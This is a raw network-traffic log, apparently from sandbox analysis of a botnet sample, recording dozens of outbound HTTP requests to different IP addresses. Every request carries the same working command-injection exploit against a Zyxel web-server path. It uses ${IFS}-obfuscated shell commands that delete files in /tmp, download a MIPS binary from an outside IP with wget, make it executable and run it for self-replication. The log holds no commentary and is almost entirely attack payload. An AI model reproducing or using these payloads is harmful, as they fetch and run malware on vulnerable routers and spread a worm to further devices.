                                          Jan 14, 2024 15:46:13.938769102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3638192.168.2.235638046.116.24.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938787937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3639192.168.2.235012051.77.85.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938848972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3640192.168.2.2352616166.161.74.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938874960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3641192.168.2.233979489.136.201.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938921928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3642192.168.2.235140264.242.12.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938961029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3643192.168.2.2334844125.23.245.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938978910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3644192.168.2.2341502219.69.45.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939008951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3645192.168.2.235706863.162.177.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939024925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3646192.168.2.2338178134.227.84.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939090014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3647192.168.2.2334944105.229.40.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939127922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3648192.168.2.2336960217.105.244.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939168930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3649192.168.2.235552866.77.127.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939213037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3650192.168.2.2341180166.255.175.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939244986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3651192.168.2.2335760194.2.111.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939290047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3652192.168.2.235314673.165.169.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939328909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3653192.168.2.234812825.9.37.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939383030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3654192.168.2.235669463.181.15.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939393044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3655192.168.2.236035870.255.32.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939456940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3656192.168.2.2340142123.122.180.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939517975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3657192.168.2.2347434178.223.85.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939544916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3658192.168.2.236031097.62.51.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939548969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3659192.168.2.2338122122.227.141.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939599037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3660192.168.2.2334160175.236.196.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939630032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3661192.168.2.2357574190.108.61.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939677000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3662192.168.2.233803882.81.38.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939717054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3663192.168.2.2334036112.51.235.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939765930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3664192.168.2.2353556190.175.20.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939795971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3665192.168.2.2338562173.111.93.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939830065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3666192.168.2.2354052147.215.68.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939861059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3667192.168.2.2336892152.206.125.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939928055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3668192.168.2.2353674110.67.194.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.939960957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3669192.168.2.2335392170.25.238.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940006971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3670192.168.2.235800066.13.47.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940066099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3671192.168.2.234204877.115.78.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940105915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3672192.168.2.234651281.252.76.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940128088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3673192.168.2.2348382123.127.142.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940191031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3674192.168.2.2347784186.161.62.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940231085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3675192.168.2.2334756106.15.50.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940248013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3676192.168.2.2354172122.123.91.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940316916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3677192.168.2.2343992198.214.17.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940325975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3678192.168.2.2358436222.27.40.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940360069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3679192.168.2.234514260.9.232.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940412998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3680192.168.2.2359962121.59.46.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940460920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3681192.168.2.234851480.20.106.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940517902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3682192.168.2.2349964119.207.211.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940556049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3683192.168.2.2344630138.157.102.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940614939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3684192.168.2.2340496208.58.195.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940614939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3685192.168.2.2347830106.123.181.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940638065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3686192.168.2.2357938133.145.254.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940677881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3687192.168.2.2356880193.200.122.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940704107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3688192.168.2.234476289.137.108.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940778971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3689192.168.2.2354786155.19.227.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940812111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3690192.168.2.234696498.43.117.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940872908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3691192.168.2.235182866.154.125.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940891027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3692192.168.2.2333208216.209.203.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940924883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3693192.168.2.2352724149.8.183.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940958977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3694192.168.2.2335474159.16.196.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.940994978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3695192.168.2.2348792166.123.154.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941061020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3696192.168.2.2349376221.199.90.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941078901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3697192.168.2.235767849.139.30.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941102028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3698192.168.2.2334490101.60.200.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941145897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3699192.168.2.2350146173.180.103.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941179037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3700192.168.2.2334506212.250.202.89443
                                          TimestampBytes transferredDirectionData
